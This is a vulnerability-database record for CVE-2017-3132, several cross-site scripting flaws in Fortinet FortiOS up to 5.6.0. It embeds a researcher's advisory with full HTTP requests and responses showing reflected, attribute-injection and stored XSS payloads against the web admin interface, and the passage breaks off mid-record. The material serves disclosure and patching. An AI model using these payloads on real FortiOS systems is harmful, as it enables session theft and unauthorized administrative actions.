GET /p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ HTTP/1.1 Host: 192.168.1.99 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: / Accept-Language: pl,en-US;q=0.7,en;q=0.3 Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff X-Requested-With: XMLHttpRequest Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D DNT: 1 Connection: close

2 - Http response:

HTTP/1.1 200 OK Date: Thu, 23 Mar 2017 15:36:33 GMT Server: xxxxxxxx-xxxxx Content-Security-Policy: frame-ancestors 'self' Expires: Thu, 23 Mar 2017 15:36:33 GMT Vary: Cookie,Accept-Encoding Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT X-UA-Compatible: IE=Edge Cache-Control: max-age=0 X-FRAME-OPTIONS: SAMEORIGIN Set-Cookie: csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; expires=Thu, 22-Mar-2018 15:36:33 GMT; Max-Age=31449600; Path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 70940 (...)

ABC alert('XSS') (...)

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0476",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "fortios",
        "scope": "lte",
        "trust": 1.8,
        "vendor": "fortinet",
        "version": "5.6.0"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "fortinet",
        "version": "5.6.0"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.6"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.4.5"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.4.4"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.4.3"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.4.2"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.4.1"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.4.0"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.0"
      },
      {
        "model": "fortios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.6.1"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "100009"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007778"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1510"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-3132"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:fortinet:fortios",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007778"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Patryk Bogdan of Secorda.",
    "sources": [
      {
        "db": "BID",
        "id": "100009"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1510"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2017-3132",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CVE-2017-3132",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-111335",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.8,
            "id": "CVE-2017-3132",
            "impactScore": 2.7,
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "trust": 1.8,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2017-3132",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2017-3132",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201707-1510",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-111335",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-111335"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007778"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1510"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-3132"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to Execute unauthorized code or commands via the action input during the activation of a FortiToken. Fortinet FortiOS Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. FortiOS is prone to multiple cross-site scripting vulnerabilities. \nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected  site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. # Title: FortiOS \u003c= 5.6.0 Multiple XSS Vulnerabilities\n# Vendor: Fortinet (www.fortinet.com)\n# CVE: CVE-2017-3131, CVE-2017-3132, CVE-2017-3133\n# Date: 28.07.2016\n# Author: Patryk Bogdan (@patryk_bogdan)\n\nAffected FortiNet products:\n* CVE-2017-3131 : FortiOS versions 5.4.0 to 5.6.0\n* CVE-2017-3132 : FortiOS versions upto 5.6.0\n* CVE-2017-3133 : FortiOS versions upto 5.6.0\n\nFix:\nUpgrade to FortiOS version 5.6.1\n\nVideo PoC (add admin):\nhttps://youtu.be/fcpLStCD61Q\n\nVendor advisory:\nhttps://fortiguard.com/psirt/FG-IR-17-104\n\n\nVulns:\n\n1. XSS in WEB UI - Applications:\n\nURL:\nhttps://192.168.1.99/ng/fortiview/app/15832\" onmouseover=alert(\u0027XSS\u0027) x=\"y\n\nHttp request:\nGET /ng/fortiview/app/15832%22%20onmouseover=alert(\u0027XSS\u0027)%20x=%22y HTTP/1.1\nHost: 192.168.1.99\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: pl,en-US;q=0.7,en;q=0.3\nCookie: APSCOOKIE_573485771=\"Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AZxzmYv40KrD1JvCdcctTzmuS+OEd08y+4Vh54tq%2Fap2ej%2F1gJfbaindJ5r4wDXZh%0A4q%2FfgVCdTfMFn+Mr6Xj5Og%3D%3D%0A%26AuthHash%3D9+TbiFXbk+Qkks0pPlkbNDx2L1EA%0A\"; ccsrftoken_573485771=\"5424C6B3842788A23E3413307F1DFFC5\"; ccsrftoken=\"5424C6B3842788A23E3413307F1DFFC5\"; VDOM_573485771=root; csrftoken_573485771=da85e919f71a610c45aff174b23c7a10\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHttp response:\nHTTP/1.1 200 OK\nDate: Thu, 23 Mar 2017 12:07:47 GMT\nServer: xxxxxxxx-xxxxx\nCache-Control: no-cache\nPragma: no-cache\nExpires: -1\nVary: Accept-Encoding\nContent-Length: 6150\nConnection: close\nContent-Type: text/html; charset=utf-8\nX-Frame-Options: SAMEORIGIN\nContent-Security-Policy: frame-ancestors \u0027self\u0027\nX-UA-Compatible: IE=Edge\n(...)\n\u003cspan class=\"fgd-app tooltip id_15832\" onmouseover=\"alert(\u0027XSS\u0027)\" x=\"y \" data-address=\"undefined\" data-dport=\"443\" data-protocol=\"6\"\u003e\u003ca href=\"https://www.fortiguard.com/fos/15832\" onclick=\"return false;\" data-hasqtip=\"2\"\u003e\u003cspan class=\"app_icon app15832\" onmouseover=\"alert(\u0027XSS\u0027)\" x=\"y\"\u003e\u003c/span\u003e\u003clabel class=\"app_label\" title=\"\"\u003e15832\" onmouseover=alert(\u0027XSS\u0027) x=\"y\u003c/label\u003e\u003c/a\u003e\u003c/span\u003e\n(...)\n\n\n2. XSS in WEB UI - Assign Token:\n\nURL:\nhttps://192.168.1.99/p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(\u0027XSS\u0027)%3C/script%3E%3Cscript%3E\n\nHttp request:\nGET /p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E%3Cscript%3E HTTP/1.1\nHost: 192.168.1.99\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: pl,en-US;q=0.7,en;q=0.3\nCookie: APSCOOKIE_573485771=\"Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0ALuXSfDjrp0Gel8F8TeKlBgC3kk4P1mhdELHr2Cicb3Zb6hBUnT9ZZnjXC44Dc7bD%0Ae2ymJG%2FgbHFa+4N9AVDIrg%3D%3D%0A%26AuthHash%3DMyJMLA32ueruHIEKia2eb9BWi8oA%0A\"; ccsrftoken_573485771=\"314A25687F6B2075F9413405575D477\"; ccsrftoken=\"314A25687F6B2075F9413405575D477\"; VDOM_573485771=root; csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHttp response:\nHTTP/1.1 200 OK\nDate: Thu, 23 Mar 2017 13:39:17 GMT\nServer: xxxxxxxx-xxxxx\nContent-Security-Policy: frame-ancestors \u0027self\u0027\nExpires: Thu, 23 Mar 2017 13:39:17 GMT\nVary: Cookie,Accept-Encoding\nLast-Modified: Thu, 23 Mar 2017 13:39:17 GMT\nX-UA-Compatible: IE=Edge\nCache-Control: max-age=0\nX-FRAME-OPTIONS: SAMEORIGIN\nSet-Cookie: csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160; expires=Thu, 22-Mar-2018 13:39:17 GMT; Max-Age=31449600; Path=/\nConnection: close\nContent-Type: text/html; charset=utf-8\nContent-Length: 3485\n(...)\n\u003cscript type=\"text/javascript\"\u003e\n    var ftokens = [];\n    var action = \u0027\u003c/script\u003e\u003cscript\u003ealert(\u0027XSS\u0027)\u003c/script\u003e\u003cscript\u003e\u0027;\n\u003c/script\u003e\n\u003c/head\u003e\n(...)\n\n\n3. Stored XSS in WEB UI - Replacement Messages:\n\n#1 - Http request:\nPOST /p/system/replacemsg/edit/sslvpn/sslvpn-login/ HTTP/1.1\nHost: 192.168.1.99\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: */*\nAccept-Language: pl,en-US;q=0.7,en;q=0.3\nReferer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff\nX-Requested-With: XMLHttpRequest\nContent-Length: 125\nCookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771=\"Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A\"; ccsrftoken_573485771=\"592068D7C2B5BDB7A91833DB6A512C14\"; ccsrftoken=\"592068D7C2B5BDB7A91833DB6A512C14\"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D\nDNT: 1\nConnection: close\n\ncsrfmiddlewaretoken=d58f666c794024295cece8c5b8b6a3ff\u0026buffer=ABC%3C%2Ftextarea%3E%0A%3Cscript%3Ealert(\u0027XSS\u0027)%3C%2Fscript%3E%0A\n\n#1 - Http response:\nHTTP/1.1 302 FOUND\nDate: Thu, 23 Mar 2017 15:36:33 GMT\nServer: xxxxxxxx-xxxxx\nContent-Security-Policy: frame-ancestors \u0027self\u0027\nExpires: Thu, 23 Mar 2017 15:36:33 GMT\nLast-Modified: Thu, 23 Mar 2017 15:36:33 GMT\nCache-Control: max-age=0\nX-FRAME-OPTIONS: SAMEORIGIN\nX-UA-Compatible: IE=Edge\nSet-Cookie: EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D; Path=/\nLocation: https://192.168.1.99/p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/\nConnection: close\nContent-Type: text/html; charset=utf-8\nContent-Length: 0\n\n#2 - Http request:\nGET /p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ HTTP/1.1\nHost: 192.168.1.99\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: */*\nAccept-Language: pl,en-US;q=0.7,en;q=0.3\nReferer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff\nX-Requested-With: XMLHttpRequest\nCookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771=\"Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A\"; ccsrftoken_573485771=\"592068D7C2B5BDB7A91833DB6A512C14\"; ccsrftoken=\"592068D7C2B5BDB7A91833DB6A512C14\"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D\nDNT: 1\nConnection: close\n\n#2 - Http response:\nHTTP/1.1 200 OK\nDate: Thu, 23 Mar 2017 15:36:33 GMT\nServer: xxxxxxxx-xxxxx\nContent-Security-Policy: frame-ancestors \u0027self\u0027\nExpires: Thu, 23 Mar 2017 15:36:33 GMT\nVary: Cookie,Accept-Encoding\nLast-Modified: Thu, 23 Mar 2017 15:36:33 GMT\nX-UA-Compatible: IE=Edge\nCache-Control: max-age=0\nX-FRAME-OPTIONS: SAMEORIGIN\nSet-Cookie: csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; expires=Thu, 22-Mar-2018 15:36:33 GMT; Max-Age=31449600; Path=/\nConnection: close\nContent-Type: text/html; charset=utf-8\nContent-Length: 70940\n(...)\n\u003cform id=\"replacemsg_form\"\u003e\n\u003cdiv style=\u0027display:none\u0027\u003e\u003cinput type=\u0027hidden\u0027 name=\u0027csrfmiddlewaretoken\u0027 value=\u0027d58f666c794024295cece8c5b8b6a3ff\u0027 /\u003e\u003c/div\u003e          \u003ctextarea id=\"buffer\" name=\"buffer\"\u003eABC\u003c/textarea\u003e\n\u003cscript\u003ealert(\u0027XSS\u0027)\u003c/script\u003e\n\u003c/textarea\u003e\n(...)\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-3132"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007778"
      },
      {
        "db": "BID",
        "id": "100009"
      },
      {
        "db": "VULHUB",
        "id": "VHN-111335"
      },
      {
        "db": "PACKETSTORM",
        "id": "143543"
      }
    ],
    "trust": 2.07
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-111335",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-111335"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-3132",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "100009",
        "trust": 2.0
      },
      {
        "db": "SECTRACK",
        "id": "1039020",
        "trust": 1.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "42388",
        "trust": 1.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007778",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1510",
        "trust": 0.7
      },
      {
        "db": "VULHUB",
        "id": "VHN-111335",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "143543",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-111335"
      },
      {
        "db": "BID",
        "id": "100009"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007778"
      },
      {
        "db": "PACKETSTORM",
        "id": "143543"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1510"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-3132"
      }
    ]
  },
  "id": "VAR-201709-0476",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-111335"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-11-23T22:07:16.121000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "FG-IR-17-104",
        "trust": 0.8,
        "url": "http://fortiguard.com/psirt/FG-IR-17-104"
      },
      {
        "title": "Fortinet FortiOS Fixes for cross-site scripting vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=72203"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007778"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1510"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-111335"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007778"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-3132"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/100009"
      },
      {
        "trust": 1.7,
        "url": "https://fortiguard.com/advisory/fg-ir-17-104"
      },
      {
        "trust": 1.1,
        "url": "https://www.exploit-db.com/exploits/42388/"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1039020"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3132"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-3132"
      },
      {
        "trust": 0.4,
        "url": "http://fortiguard.com/psirt/fg-ir-17-104"
      },
      {
        "trust": 0.3,
        "url": "http://www.fortinet.com/"
      },
      {
        "trust": 0.1,
        "url": "https://192.168.1.99/p/user/ftoken/activate/user/guest/?action=%3c/script%3e%3cscript%3ealert(\u0027xss\u0027)%3c/script%3e%3cscript%3e"
      },
      {
        "trust": 0.1,
        "url": "https://www.fortinet.com)"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3133"
      },
      {
        "trust": 0.1,
        "url": "https://www.fortiguard.com/fos/15832\""
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3131"
      },
      {
        "trust": 0.1,
        "url": "https://192.168.1.99/p/system/replacemsg-group/edit/none/sslvpn/sslvpn-login/"
      },
      {
        "trust": 0.1,
        "url": "https://youtu.be/fcplstcd61q"
      },
      {
        "trust": 0.1,
        "url": "https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/"
      },
      {
        "trust": 0.1,
        "url": "https://192.168.1.99/ng/fortiview/app/15832\""
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-111335"
      },
      {
        "db": "BID",
        "id": "100009"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007778"
      },
      {
        "db": "PACKETSTORM",
        "id": "143543"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1510"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-3132"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-111335"
      },
      {
        "db": "BID",
        "id": "100009"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007778"
      },
      {
        "db": "PACKETSTORM",
        "id": "143543"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1510"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-3132"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-09-12T00:00:00",
        "db": "VULHUB",
